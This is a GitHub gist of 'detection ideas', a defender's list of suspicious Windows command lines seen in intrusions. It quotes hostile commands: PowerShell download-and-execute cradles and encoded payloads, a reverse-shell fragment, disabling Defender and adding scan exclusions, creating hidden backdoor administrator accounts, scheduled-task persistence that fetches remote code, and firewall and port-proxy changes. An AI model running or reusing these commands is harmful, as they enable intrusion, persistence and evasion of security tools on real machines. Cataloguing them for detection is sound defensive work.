Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC
Last active January 30, 2023 14:09
Show Gist options
  • Save JohnLaTwC/b1619682e0202cbad2eb7ad71edc3790 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/b1619682e0202cbad2eb7ad71edc3790 to your computer and use it in GitHub Desktop.
Detection ideas
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event Logs')))) {IEX(New-Object Net.WebClient).DownloadString(...')}"
cmd /c powershell "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('SCM Event8 Log')))) {IEX(New-Object Net.WebClient).DownloadString(h...
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Windows Events Filter')))) {IEX(New-Object Net.WebClient).DownloadString(...)}"
cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('Systems Manage Filter')))) {IEX(New-Object Net.WebClient).DownloadString(... ')}"
C:\Windows\system32\cmd.exe /c reg add "HKLM\software\Microsoft\Windows\currentversion\policies\system" /v localaccounttokenfilterpolicy /t REG_DWORD /d 1 /f
cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn <name> /tr "powershell -c '\\\"<domain>\\\",\\\"<domain>\\\",\\\"<domain>\\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\\"DownloadString\\\"(\\\"http://$_/<path>?1.1*$env:username*$env:computername\\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn <name>
// detection evasion
cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:/windows/system32/WindowsPowerShell/v1.0/powershell.exe;Add-MpPreference -ExclusionPath c:/ & powershell IEx(New-Object Net.WebClient).DownLoadString(...)
//hide a backdoor account on logon screen
C:\Windows\system32\cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v <account> /t REG_DWORD /d 0 /f
// group manipulation
cmd.exe /c net localgroup administrators <account> /add
C:\Windows\system32\cmd.exe /c net user /add admin <password> && net localgroup Administrators admin /add
// redirection on the command line that indicates multi-stage payload
cmd.exe /c <filepath> > stage1.txt
cmd.exe /c whoami > <filepath>
// use of LOLBAS for post-compromise commands
cmd /c for /d %i in (<ipv4>:<port> <ipv4>:<port> <ipv4>:<port>) do Msiexec /i http://%i/<hex-digits>.Png /Q
WMIC.exe, rundll32.exe, cscript.exe, msiexec.exe, LOLBAS (lolbas-project.github.io)
schtasks.exe /create /tn Miantenance_init /ru SYSTEM /sc ONSTART /tr "C:\windows\<path>\Maintenance.bat"
// firewall manipulation and persistence
cmd.exe /c netsh.exe firewall add <name> tcp <port> DNS&netsh interface portproxy add <name> listenport=<port> connectaddress=1.1.1.1 connectport=<port>&schtasks /create /ru system /sc MINUTE /mo <mins> /st <hour>:00:00 /tn "<taskname>" /tr "powershell -ep bypass -e "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQ…" /F&net user <account> <password> /ADD && net localgroup administrators <account> /ADD
// redteam/blueteam testing
calc.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment